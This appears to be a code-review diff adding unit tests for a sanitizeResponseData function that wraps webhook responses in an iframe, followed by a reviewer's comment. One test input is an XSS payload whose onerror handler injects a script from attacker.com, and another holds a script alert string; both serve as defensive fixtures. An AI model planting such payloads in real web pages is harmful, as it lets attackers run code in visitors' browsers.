packages/nodes-base/nodes/RespondToWebhook/test/utils.test.ts

```diff
@@ -35,3 +43,97 @@ describe('configuredOutputs', () => {
 		expect(result).toEqual(['main']);
 	});
 });
+
+describe('sanitizeResponseData', () => {
+	test.each([
+		{
+			srcdoc: 'https://example.com',
+		},
+		{
+			srcdoc:
+				"<source onerror=\"s=document.createElement('script');s.srcdoc='http://attacker.com/evil.js';document.body.appendChild(s);\">",
+		},
+		{
+			srcdoc: "<div>Test with  'single quote'</div>",
+		},
+		{
+			srcdoc:
+				"John's company \"TechCorp & Associates\" announced: 'We're launching a revolutionary product at €1,299.99 — it's 50% faster than competitors!' The CEO said, \"This isn't just an upgrade; it's a complete transformation.\" Users praised the app's ability to handle complex data like <script>alert('XSS')</script> and symbols such as @, #, $, %, ^, &, *, (, ), [, ], {, }, |, , /, ?, <, >, ~, `, +, =, -, _, and even emojis like 🚀 & 💡. The product description reads: \"It supports UTF-8 encoding, handles apostrophes in names like O'Connor & D'Angelo, processes mathematical expressions like 2 < 5 > 1, and manages URLs such as https://example.com/path?param=value&other='test'. We've tested it with HTML entities like &amp;, &lt;, &gt;, &quot;, &#39;, and even complex strings like `console.log(\"Hello 'World'!\");`\" — truly impressive!",
+		},
+	])('wraps the response body in an iframe', ({ srcdoc }) => {
+		const result = sanitizeResponseData(srcdoc, true);
+		const singleQuoteReplaced = replaceSingleQuotes(srcdoc);
+
+		expect(result).toContain('<iframe');
+		expect(result).toContain(`srcdoc='${singleQuoteReplaced}'`);
+		expect(result).toContain('width:100vw');
+		expect(result).toContain('height:100vh');
+		expect(result).toContain('position:fixed');
+		expect(result).toContain('top:0');
+		expect(result).toContain('left:0');
+		expect(result).toContain('border:none');
+		expect(result).toContain('allowtransparency="true"');
+		expect(result.trim().startsWith('<iframe')).toBe(true);
+		expect(result.trim().endsWith('</iframe>')).toBe(true);
```

Comment:
Why don't we match the entire result instead these individual parts? Would be more accurate. Or use `toMatchSnapshot()`